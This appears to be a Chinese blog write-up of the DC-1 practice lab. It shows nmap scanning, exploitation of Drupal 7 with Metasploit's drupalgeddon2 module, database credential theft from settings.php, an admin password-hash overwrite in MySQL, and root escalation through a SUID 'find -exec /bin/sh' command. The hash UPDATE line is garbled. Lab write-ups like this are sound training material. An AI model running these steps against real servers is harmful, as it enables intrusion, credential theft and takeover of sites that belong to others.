DC1靶机解析+思路

DC系列-——dc1靶机解析

确定IP:
首先切换网卡到nat模式,再用kali中的nmap工具扫描当前网段的主机,查看开放主机

指令:nmap -sS 网段

在这里插入图片描述

试一下,找dc1的ip

在这里插入图片描述

打开界面是这样,看到Drupal(一种CMF框架),再使用nmap扫描80端口综合信息查找版本
指令:nmap -A -p80 DC1的ip

在这里插入图片描述

扫描到drupal的版本是7,接下来可以用searchsploit查找对应的漏洞

在这里插入图片描述

发现有的有rb文件 (rb文件是导入到msfconsole工具中的漏洞模块),查看是否有关于drupal的漏洞可以使用,这里上网查了一下各位师傅们,说是用这个模块

exploit/unix/webapp/drupal_drupalgeddon2

在这里插入图片描述

使用模块,然后set rhosts ,直接run过去

set rhosts xxx.xxx.xxx.xxx
run

在这里插入图片描述

使用pty生成虚拟终端

python -c “import pty;pty.spawn(/bin/sh’)"

在这里插入图片描述

然后查看当前目录,发现flag1.txt,查看发现flag1.txt只是前戏

在这里插入图片描述

flag1是一个提示,说明需要查看cms的config文件,加下来就是找到config文件查看,获取下一条信息,百度找到配置文件的位置

sites/default/settings.php

在这里插入图片描述

路径
在这里插入图片描述

找到数据库密码,数据库密码应该是第二个flag,接下来就是去数据库找文件了

在这里插入图片描述

进入数据库,然后选择drupaldb查找发现users表,查看字段

desc users; 

在这里插入图片描述

发现用户名和密码的字段,但是发现加密方式咱也看不懂,或许有本地加密文件,查看…

find / -name “*pass*

在这里插入图片描述

果然有,文件路径 /var/www/scripts/password-hash.sh,然后查找网上的使用方法
php password-hash.sh 密码,就会出现密码(在/var/www/html目录底下执行)

在这里插入图片描述

找到密码之后去mysql里面更新数据表

update users set pass="$S$DGNd1zikVA6n5iFua4HyRb5240su<s="$S$DGNd1zikVA6n5iFua4HyRb5240suDkmXJIua1nvHi6EiF  <Rb5240suDkmXJIua1nvHi6EiFkCGnR7G" where name="admin  ";   

在这里插入图片描述

改完数据库之后登录,发现flag3
在这里插入图片描述

在这里插入图片描述

flag3提示exec 和 shell,接下来就是找flag4了

find / -name "flag4*"

在这里插入图片描述

查看flag4,提示我们需要找到在root目录下的flag

查看当前用户有哪些权限

find / -perm -u=s 2>/dev/null或者find / -perm -4000 2>/dev/null,发现find有root权限,再联想到之前flag3的exec,就可以用find提权

find提权:
首先创建文件

touch 123->find提权 find 123-exec ‘/bin/sh’ ;

在这里插入图片描述

获取到root权限之后查看root目录下的flag,发现finalflag,这就是最后的flag

在这里插入图片描述

  • 5
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值